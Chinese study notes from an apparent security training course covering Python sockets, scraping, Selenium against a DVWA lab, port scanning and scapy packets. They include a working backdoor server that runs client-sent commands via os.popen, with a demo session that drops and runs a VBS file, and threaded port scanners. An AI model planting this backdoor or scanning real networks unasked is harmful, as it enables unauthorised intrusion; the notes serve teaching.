python网络编程

import socket

# 定义一个客户端连接
def test_client():
    # 建立与服务器的连接
    s = socket.socket()     # 此类实例的方式，默认使用TCP协议
    s.connect(('127.0.0.1', 554))     #服务器的ip地址和端口

    # 传输数据（收发数据包）
    content = "Welcome to Woniu College"
    s.send(content.encode('gbk'))

    # 关闭连接
    s.close()
 
test_client()

# 定义一个服务器端
def test_server():
    s = socket.socket()
    s.bind(('127.0.0.1', 555))  # 绑定服务器端IP和端口号，服务器只要启动就会打开端口
    s.listen()                      # 保持对555端口的监听
    while True:
        chanel, client = s.accept()     # 接收来自客户端的数据（）
        message = chanel.recv(1024)     #设置缓冲区的大小
        print(message.decode())
        print(client)                   #('127.0.0.1', 6271)
        print(chanel)                   #<socket.socket fd=268, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=('127.0.0.1', 555), raddr=('127.0.0.1', 6271)>

test_server()

import socket
def normal_talk():
    s = socket.socket()
    # s.bind(('127.0.0.1', 6666))     # 只允许本设备访问
    s.bind(('0.0.0.0', 6666))         # 所有IP地址均可以访问6666端口
    s.listen()
    chanel, client = s.accept()       # 无法接受多个客户端
    while True:
        # chanel, client = s.accept()     # 此时accept()会进入阻塞状态
        receive = chanel.recv(1024).decode()
        print(f"收到消息：{receive}")
        reply = receive.replace("吗？", "!")
        chanel.send(reply.encode())        #服务器向客户机发送信息
    # s.close()                         # 在死循环之后的代码，不可执行

# 核心思路：客户端发送一条特殊字符串，里面包含要执行的命令，让服务器端执行命令并返回结果给客户端
import os
def attack_talk():
    try:
        s = socket.socket()
        s.bind(('0.0.0.0', 6666))
        s.listen()
        chanel, client = s.accept()
        while True:
            receive = chanel.recv(1024).decode()

            # ==##==,command
            if receive.startswith('==##=='):
                command = receive.split(',')[-1]
                reply = os.popen(command).read()
                chanel.send(f"命令{command}的运行结果：\n{reply}".encode())
            else:
                print(f"收到消息：{receive}")
                reply = receive.replace("吗？", "!")
                chanel.send(reply.encode())
    except:
        s.close()
        attack_talk()

attack_talk()

import socket

s = socket.socket()
s.connect(('127.0.0.1', 6666))
# s.connect(('192.168.0.106', 6666))
while True:
    message = input("请输入消息：")
    s.send(message.encode())
    receive = s.recv(10240)
    print(f"服务器回复：{receive.decode()}")

请输入消息：==##==,echo msgbox("你中招了") > d:\t.vbs
服务器回复：命令echo msgbox("你中招了") > d:\t.vbs的运行结果：

请输入消息：==##==,d:\t.vbs
服务器回复：命令d:\t.vbs的运行结果：

爬虫

---

DOM:

需要安装lxml

from bs4 import BeautifulSoup
import requests

resp = requests.get('http://www.woniunote.com/')

# 初始化解析器
html= BeautifulSoup(resp.text, 'lxml')

# 查找页面元素(根据标签层次进行查找）
print(html.head.title)      # 根据标签的层次找页面标题
print(html.head.title.string)       # 获取页面标题的文本内容
print(html.div)             # 查找页面中的第一个DIV元素
print(html.div.div.div)

查找页面元素的通用方法：

1、find_all：根据标签，属性，XPath等进行查找

from bs4 import BeautifulSoup
import requests

resp = requests.get('http://www.woniunote.com/')

# 初始化解析器
html= BeautifulSoup(resp.text, 'lxml')
# 查找页面所有超链接
links = html.find_all('a')
for link in links:
    # print(link)         # 输出 类似<a class="navbar-brand" href="#">快捷导航</a>
    print(link['href'])    #输出href属性的值


# 根据id或class等属性查找
keyword = html.find(id='keyword')  #查找id属性为keyword的标签，<input class="form-control" id="keyword" οnkeyup="doSearch(event)" placeholder="请输入关键字" type="text"/>
print(keyword)
print(keyword['placeholder'])   #输出属性placeholder的值


titles = html.find_all(class_='title')   #查找class=“title”的标签
for title in titles:
    print(title)
    print(title.string)
    print(title.find('a'))              #查找title中的a标签内容
    print(title.find('a').string)
    
title = html.find(text='揭秘：带你了解学员眼中真实的阿多比！')
print(title.parent)     #a href="/article/605">揭秘：带你了解学员眼中真实的阿多比！</a>
print(title.parent.parent)      #<div class="title"><a href="/article/605">揭秘：带你了解学员眼中真实的阿多比！</a></div>


# 根据xpath的风格进行查找 //div[@class='title']
titles = html.find_all('div', {'class':'title'})
for title in titles:
    print(title.string)

2、select：CSS选择器，div, #id, .class

from bs4 import BeautifulSoup
import requests

resp = requests.get('http://www.woniunote.com/')

# 初始化解析器
html= BeautifulSoup(resp.text, 'lxml')

# CSS选择器
# titles = html.select('div.title')
titles = html.select('.title')
for title in titles:
    print(title.string)

keyword = html.select('#keyword')
print(keyword[0]['placeholder'])

lis = html.select('ul li')
print(lis)

基于selenium操作web页面

---

firfox驱动器下载

Chrome驱动器，要对应好版本，相差不大就行。

将下载解压后的exe文件设置环境变量，由于已经将python设置了环境变量，所以可以直接将exe文件放到python目录中

还要设置浏览器的环境变量。

import time
from selenium import webdriver
from selenium.webdriver.common.by import By
# 第一步：先实例化webdriver对象，用于初始化浏览器操作
# 默认情况下，建议将chromedriver.exe等放在PATH环境变量的某个目录中，否则需要在参数executable_path中指定
driver = webdriver.Chrome()
driver.get('http://dvwa/login.php')
time.sleep(1)
print(driver.title)   #得到标题的内容
print(driver.page_source)       #得到网页源代码
#向网页输入内容
driver.find_element(by=By.NAME,value='username').send_keys("admin") #将name属性值为username的标签赋值amdin
driver.find_element(by=By.NAME,value="password").send_keys("22222")
driver.find_element(by=By.NAME,value="Login").click()

处理SMPT发送邮箱

扫描ip端口

import socket
# 对目标IP进行端口扫描，尝试连接目标IP和端口，如果连接成功，说明端口开放，否则未开放。

def socket_port(ip):
    for port in range(1,65536):
        try:
            s = socket.socket()
            s.settimeout(0.5)       # 设置无法连接情况下超时时间，提升扫描效率
            s.connect((ip, port))
            print(f"端口：{port} 可用.")
            s.close()
        except ConnectionRefusedError:
            # print(f"端口：{port} 不可用.")
            pass
        except socket.timeout:
            pass

# 基于多线程进行端口扫描
import socket,threading
def socket_port_thread(ip, start):
    for port in range(start, start+50):
        try:
            s = socket.socket()
            s.settimeout(0.5)       # 设置无法连接情况下超时时间，提升扫描效率
            s.connect((ip, port))
            print(f"端口：{port} 可用.")
            s.close()
        except:
            pass

if __name__ == '__main__':

    for i in range(1, 5000, 50):
        threading.Thread(target=socket_port_thread, args=('192.168.0.107', i)).start()

scapy

发送ICMP报文
>>> send(IP(dst="192.168.0.107")/ICMP())
WARNING: Mac address to reach destination not found. Using broadcast.
.
Sent 1 packets.

发送ICMP报文，并带有内容

>>> send(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp")
WARNING: Mac address to reach destination not found. Using broadcast.
.
Sent 1 packets.

发送指定间隔和次数的ICMP

>>> send(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp",inter=1,count=5)
.....
Sent 5 packets.

>>> pkg=sr1(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp")
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>> pkg
<IP  version=4 ihl=5 tos=0x0 len=47 id=5061 flags= frag=0 ttl=128 proto=icmp chksum=0xa4e3 src=192.168.0.107 dst=192.168.0.106 |<ICMP  type=echo-reply code=0 chksum=0x9c0b id=0x0 seq=0x0 unused='' |<Raw  load='ppppppppppppppppppp' |>>>
>>> pkg[Raw].load
b'ppppppppppppppppppp'
>>>

构造ARP 请求

通过arp原理，来扫描网络中的ip，因为arp是不会被防火墙阻挡。

>>> pkg=sr1(ARP(psrc="192.168.0.106",pdst="192.168.0.107"))
Begin emission:
WARNING: Mac address to reach destination not found. Using broadcast.
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>> pkg
<ARP  hwtype=0x1 ptype=IPv4 hwlen=6 plen=4 op=is-at hwsrc=00:0c:29:50:2e:93 psrc=192.168.0.107 hwdst=e0:d4:e8:c6:41:9d pdst=192.168.0.106 |>
>>>